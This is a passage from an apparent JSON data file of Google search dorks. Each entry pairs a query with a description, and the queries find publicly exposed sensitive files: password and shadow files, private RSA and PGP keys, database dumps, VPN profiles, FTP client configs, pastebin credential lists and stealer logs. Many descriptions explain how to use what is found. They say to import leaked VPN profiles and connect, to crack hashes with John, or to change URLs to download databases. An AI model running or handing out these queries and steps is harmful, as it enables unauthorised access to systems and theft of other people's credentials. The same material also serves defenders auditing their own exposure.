ext:java intext:\"executeUpdate\"\r\n# Exploit Author: BULLETMHS"}, {"dork": "\"Started by upstream project\" ext:txt", "description": "Author: nadirb19\r\nGoogle Dork: \"Started by upstream project\" ext:txt"}, {"dork": "intitle:\"index of\" env.cgi", "description": "Simple Dork that displays the env file which contains env\r\nvariables, usually juicy stuff and a lot of information disclosure.\r\n\r\n*intitle:\"index of\" env.cgi*"}, {"dork": "intitle:\"Index of /confidential\"", "description": "Description-* intitle:\"Index of /confidential\"*\r\nThis google dork searches in the title of websites for the \"\"Index of\r\n/confidential\""}, {"dork": "inurl:* \"encryption.txt\"", "description": "Google dork: inurl:* \"encryption.txt\""}, {"dork": "intext:\"index of\" web", "description": "# Google Dork:intitle: intext:\"index of\" web\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: A.K.M. Mohiuddin"}, {"dork": "inurl:* \"auditing.txt\"", "description": "# Google Dork: inurl:* \"auditing.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: Gautam Rawat"}, {"dork": "intitle:\"index of\" cgi.pl", "description": "# Google Dork: intitle:\"index of\" cgi.pl\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: Gautam Rawat"}, {"dork": "inurl:\"/wp-json/oembed/1.0/embed?url=\"", "description": "Google Dork:\r\ninurl:\"/wp-json/oembed/1.0/embed?url=\"\r\n\r\nDescription:\r\nUsing this Google dork can help identify WordPress sites that have their\r\noEmbed API publicly accessible, which could potentially be useful for\r\nvarious purposes such as content scraping, data analysis, or security\r\nresearch. However, it's essential to use this information ethically and\r\nresponsibly, respecting the privacy and security of the websites you\r\ninteract with."}, {"dork": "site:com inurl:invoice", "description": "# Google Dork: site:com inurl:invoice\r\n# Files Containing Juicy Info\r\n# Date: 08/03/2024\r\n# Exploit: Sultan Shaikh"}, {"dork": "inurl:/s3.amazonaws.com ext:xml intext:index of -site:github.com", "description": "# Google Dork: inurl:/s3.amazonaws.com ext:xml intext:index of -site:github.com\r\n# Files Containing Juicy Info\r\n# Date: 19/04/2024\r\n# Exploit: Prathamesh Waidande"}, {"dork": "inurl:pastebin intitle:mastercard", "description": "# Google Dork: inurl:pastebin intitle:mastercard\r\n# Files Containing Juicy Info\r\n# Date: 19/04/2024\r\n# Exploit: Soriful Islam"}, {"dork": "\"configmap.yaml\" | \"config.yaml\" | \"*-config.yaml\" intitle:\"index of\"", "description": "# Google Dork: \"configmap.yaml\" | \"config.yaml\" | \"*-config.yaml\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date: 19/04/2024\r\n# Exploit: vinit asher"}, {"dork": "\"rbac.yaml\" | \"role.yaml\" | \"rolebinding.yaml\" | \"*-rbac.yaml\" intitle:\"index of\"", "description": "# Google Dork: \"rbac.yaml\" | \"role.yaml\" | \"rolebinding.yaml\" | \"*-rbac.yaml\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date: 19/04/2024\r\n# Exploit: vinit asher"}, {"dork": "intitle:Index of \"/etc/network\" | \"/etc/cni/net.d\"", "description": "# Google Dork: intitle:Index of \"/etc/network\" | \"/etc/cni/net.d\"\r\n# Files Containing Juicy Info\r\n# Date: 19/04/2024\r\n# Exploit: Vinit Asher"}, {"dork": "site:uat.* * inurl:login", "description": "# Google Dork: site:uat.* * inurl:login\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Jagdish rathod"}, {"dork": "site:preprod.* * inurl:login", "description": "# Google Dork: site:preprod.* * inurl:login\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Jagdish rathod"}, {"dork": "intitle:\"index of\" setting.php", "description": "# Google Dork: intitle:\"index of\" setting.php\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: saurabh kode"}, {"dork": "intext:\"dhcpd.conf\" \"index of\"", "description": "# Google Dork: intext:\"dhcpd.conf\" \"index of\"\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Prathamesh Waidande"}, {"dork": "intitle:\"/zircote/swagger-php\"", "description": "# Google Dork: intitle:\"/zircote/swagger-php\"\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Anirudh Kumar Kushwaha"}, {"dork": "intitle:index of /etc/openldap", "description": "# Google Dork: intitle:index of /etc/openldap\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Joel Indra"}, {"dork": "intitle:\"GlobalProtect Portal\"", "description": "# Google Dork: intitle:\"GlobalProtect Portal\"\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Javier Bernardo"}, {"dork": "\"PHP Fatal error:\" ext:log OR ext:txt", "description": "# Google Dork: \"PHP Fatal error:\" ext:log OR ext:txt\r\n# Files Containing Juicy Info\r\n# Date: 01/05/2024\r\n# Exploit: Nadir Boulacheb (RubX)"}, {"dork": "site:.edu filetype:xls \"root\" database", "description": "xls files of root access of edu sites."}, {"dork": "intext:\"proftpd.conf\" \"index of\"", "description": "Google Dork: intext:\"proftpd.conf\" \"index of\"\r\nGoogle finds ProFTPD configuration file.\r\nDate: 06/17/2024\r\nAuthor: Fernando Mengali"}], "Files Containing Passwords": [{"dork": "intitle:index.of people.lst", "description": "*sigh*"}, {"dork": "inurl:passlist.txt", "description": "Cleartext passwords. No decryption required!"}, {"dork": "intitle:\"index of\" intext:globals.inc", "description": "contains plaintext user/pass for mysql database"}, {"dork": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "description": "These pages display windows registry keys which reveal passwords and/or usernames."}, {"dork": "filetype:url +inurl:\"ftp://\" +inurl:\"@\"", "description": "These are FTP Bookmarks, some of which contain plaintext login names and passwords."}, {"dork": "filetype:pem intext:private", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "inurl:\"wvdial.conf\" intext:\"password\"", "description": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext."}, {"dork": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext."}, {"dork": "inurl:\"slapd.conf\" intext:\"rootpw\" -manpage -\"Manual Page\" -man: -sample", "description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\"."}, {"dork": "filetype:netrc password", "description": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext."}, {"dork": "ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\"", "description": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !"}, {"dork": "filetype:ini ServUDaemon", "description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more."}, {"dork": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "description": "Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched."}, {"dork": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "description": "some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect"}, {"dork": "inurl:server.cfg rcon password", "description": "Counter strike rcon passwords, saved in the server.cfg."}, {"dork": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "description": "This will look throught default phpinfo pages for ones that have a default mysql password."}, {"dork": "ext:inc \"pwd=\" \"UID=\"", "description": "Database connection strings including passwords"}, {"dork": "intitle:rapidshare intext:login", "description": "Rapidshare login passwords."}, {"dork": "server-dbs \"intitle:index of\"", "description": "Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text."}, {"dork": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "description": "search for plaintext database credentials in ASA and BAK files."}, {"dork": "filetype:sql \"insert into\" (pass|passwd|password)", "description": "Looks for SQL dumps containing cleartext or encrypted passwords."}, {"dork": "inurl:\"calendarscript/users.txt\"", "description": "CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:\"Calendar Administration : Login\" | inurl:\"calendar/admin/index.asp\" -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator."}, {"dork": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "description": "Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature."}, {"dork": "intitle:\"Index of\" .mysql_history", "description": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS..."}, {"dork": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "description": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude."}, {"dork": "intitle:index.of passwd passwd.bak", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:index.of master.passwd", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory..."}, {"dork": "intitle:\"Index of\" pwd.db", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of\" \".htpasswd\" htpasswd.bak", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of\" \".htpasswd\" \"htgroup\" -intitle:\"dist\" -apache -htpasswd.c", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit..."}, {"dork": "intitle:\"Index of\" spwd.db passwd -pam.conf", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of..etc\" passwd", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "description": "Google search for web site build with symfony framework. This file\ncontains the login / password for the databases\nAuthor: Simon Leblanc"}, {"dork": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "description": "full details dbname dbuser dbpass all plain text\nAuthor:Bastich"}, {"dork": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "description": "Unreal Tournament config, plain text passwords Author: Bastich"}, {"dork": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "description": "plain text passwods"}, {"dork": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "description": "Asian FTP software -, run the password hash through John etc. Author: Bastich"}, {"dork": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "description": "PostgreSQL database dump with passwords\nBastich"}, {"dork": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "description": "MySQL database dump with passwords\nBastich"}, {"dork": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "description": "phpMyAdmin SQL dump with passwords\nBastich"}, {"dork": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "description": "this dork locates files containing ftp passwords"}, {"dork": "filetype:sql inurl:wp-content/backup-*", "description": "Search for WordPress MySQL database backup. Author: AngelParrot"}, {"dork": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "description": "Logged username, passwords, hashes\nAuthor: GhOsT-PR"}, {"dork": "filetype:cfg \"radius\" (pass|passwd|password)", "description": "Find config files with radius configs and passwords and secrets...\nLove\nBastich"}, {"dork": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "description": "Hack the $cr1pt kiddies.\nThere are a lot of Phishing pages hosted on internet , this dork will\nprovide you with their password files. Clean and Simple\ngr00ve_hack3r\nwww.gr00vehack3r.wordpress.com"}, {"dork": "intext:charset_test= email= default_persistent=", "description": "find facebook email and password ;)"}, {"dork": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "description": "To find private RSA Private SSL Keys"}, {"dork": "ext:sql intext:@gmail.com intext:password", "description": "author:haji"}, {"dork": "inurl:typo3conf/localconf.php", "description": "typo3 passwords :-)\nBruno Schmid"}, {"dork": "xamppdirpasswd.txt filetype:txt", "description": "xamppdirpasswd.txt filetype:txt"}, {"dork": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini\nFiles containing passwords\nBy Dr4GoR1Ty"}, {"dork": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "description": "ATM Passwords\n\"automatic teller\" \"operator manual\" \"password\" filetype:pdf"}, {"dork": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "description": "Dork who collects a lot of data in excel file.\nBy Rootkit Pentester."}, {"dork": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "description": "Spreadsheets with pop3 and smtp login details.\nDecoy"}, {"dork": "inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "description": "Passwords :D\nDecoy"}, {"dork": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "description": "Files with Passwords of http and https servers in format xls and xlsx.\nEnjoy well.\nDork By Rootkit Pentester."}, {"dork": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "description": "this dork will return password sent in GET request from proxies logs.\nsubmitted by: Mohammad Al-Nasser"}, {"dork": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password", "description": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password"}, {"dork": "\"Password=\" inurl:web.config -intext:web.config ext:config", "description": "This Dork show Passwords of web.config files.\nEnjoy them!.\nDork by Rootkit Pentester."}, {"dork": "filetype:pcf \"cisco\" \"GroupPwd\"", "description": "Cisco VPN files with Group Passwords for remote access"}, {"dork": "site:github.com ext:csv userid | username | user -example password", "description": "Whoops.\nsite:github.com ext:csv userid | username | user -example password\nDecoy"}, {"dork": "\"INSERT INTO phpbb_users\" ext:sql", "description": "Finds files with usernames and hashed passwords!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"END_FILE\" inurl:\"/password.log\"", "description": "Finds user-specific login info.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"# -FrontPage-\" ext:pwd", "description": "Finds MS Frontpage passwords!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"-----BEGIN RSA PRIVATE KEY-----\" ext:key", "description": "Some hashes (passwords, certs, etc.)\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/zebra.conf\" ext:conf -git", "description": "Finds GNU Zebra login credentials\nDxtroyer"}, {"dork": "\"Stealer by W33DY\" ext:txt", "description": "Finds stealer logs with usernames, passwords and sites to input them!\nDxtroyer"}, {"dork": "ext:reg \" [HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3]\" -git", "description": "Finds files with WinVNC passwords\nDxtroyer"}, {"dork": "\"resources.db.params.password\" ext:ini -git", "description": "Finds lots of database usernames & passwords!\nDxtroyer"}, {"dork": "site:pastebin.com intext:\"*@*.com:*\"", "description": "site:pastebin.com intext:\"*@*.com:*\"\nFinds pastebin.com dumped mail lists with passwords\nTPNight"}, {"dork": "intext:DB_PASSWORD || intext:\"MySQL hostname\" ext:txt", "description": "Google Dork: intext:DB_PASSWORD || intext:\"MySQL hostname\" ext:txt\nAuthor: Tarkan Catal X\nThis dork allows you to search for WordPress configuration file.\nThis file contains Username, Password, Secret Keys and other juicy information."}, {"dork": "inurl:\"sitemanager.xml\" ext:xml -git", "description": "Finds FileZilla site manager files, containing FTP usernames and passwords\nDxtroyer"}, {"dork": "inurl:_vti_pvt/administrators.pwd", "description": "Here is a Google Dork to retrieve *sensitive information Login/password for\nMS FrontPage share point*\ninurl:_vti_pvt/administrators.pwd\nSold1er ."}, {"dork": "intitle:\"Index Of\" intext:.ftpconfig", "description": "Description :\nFTP/SFTP credentials in .ftpconfig file from Atom text editor.\nDork : intitle:\"Index Of\" intext:.ftpconfig\n~Vocuzi"}, {"dork": "intext:connectionString & inurl:web & ext:config", "description": "*Category:*\nFiles containing passwords\n*Summary:*\nA Google dork that gives SQL connection information (sql server ip,\nusername and password).\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "description": "Total commander wxc_ftp.ini run has through John etc. or even better use\nhttp://wcxftp.org.ru/"}, {"dork": "intitle:index.of config.php", "description": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!"}, {"dork": "index.of passlist", "description": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage"}, {"dork": "index.of.etc", "description": "This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!"}, {"dork": "filetype:xls username password email", "description": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective."}, {"dork": "allinurl:auth_user_file.txt", "description": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)"}, {"dork": "inurl:config.php dbuname dbpass", "description": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!"}, {"dork": "intitle:index.of trillian.ini", "description": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!"}, {"dork": "filetype:htpasswd htpasswd", "description": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*"}, {"dork": "intitle:index.of administrators.pwd", "description": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public."}, {"dork": "inurl:secring ext:skr | ext:pgp | ext:bak", "description": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!"}, {"dork": "intitle:Index.of etc shadow", "description": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system."}, {"dork": "allinurl: admin mdb", "description": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!"}, {"dork": "filetype:cfm \"cfapplication name\" password", "description": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext."}, {"dork": "eggdrop filetype:user user", "description": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users."}, {"dork": "intitle:\"index of\" intext:connect.inc", "description": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted."}, {"dork": "inurl:perform filetype:ini", "description": "Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv."}, {"dork": "filetype:properties inurl:db intext:password", "description": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating."}, {"dork": "filetype:inc intext:mysql_connect", "description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client."}, {"dork": "inurl:vtund.conf intext:pass -cvs", "description": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site."}, {"dork": "filetype:log inurl:\"password.log\"", "description": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user."}, {"dork": "filetype:dat \"password.dat\"", "description": "This file contains plaintext usernames and password. Deadly information in the hands of an attacker."}, {"dork": "filetype:conf slapd.conf", "description": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff."}, {"dork": "filetype:inc dbconn", "description": "This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!"}, {"dork": "filetype:ini ws_ftp pwd", "description": "The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file."}, {"dork": "signin filetype:url", "description": "Javascript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that."}, {"dork": "filetype:dat wand.dat", "description": "The world-famous web-browser Opera has the ability to save the password for you, and it call the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button."}, {"dork": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "description": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example."}, {"dork": "filetype:ldb admin", "description": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file."}, {"dork": "filetype:sql +\"IDENTIFIED BY\" -cvs", "description": "Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "filetype:sql password", "description": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "filetype:pwd service", "description": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'."}, {"dork": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."}, {"dork": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."}, {"dork": "inurl:ccbill filetype:log", "description": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242."}, {"dork": "filetype:mdb inurl:users.mdb", "description": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!"}, {"dork": "filetype:conf inurl:psybnc.conf \"USER.PASS=\"", "description": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses."}, {"dork": "\"Your password is * Remember this for later use\"", "description": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones)."}, {"dork": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "description": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives."}, {"dork": "intitle:\"Index of\" passwords modified", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified)."}, {"dork": "\"sets mode: +k\"", "description": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs."}, {"dork": "filetype:pwl pwl", "description": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---"}, {"dork": "inurl:/wwwboard", "description": "The software wwwboard stores its passwords in a file called \"passwd.txt\".An attacker may try to search forinurl:/wwwboardthen add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt des DES passwords."}, {"dork": "\"AutoCreate=TRUE password=*\"", "description": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google to find the results of this software."}, {"dork": "filetype:pass pass intext:userid", "description": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline."}, {"dork": "inurl:nuke filetype:sql", "description": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system."}, {"dork": "inurl:/db/main.mdb", "description": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location."}, {"dork": 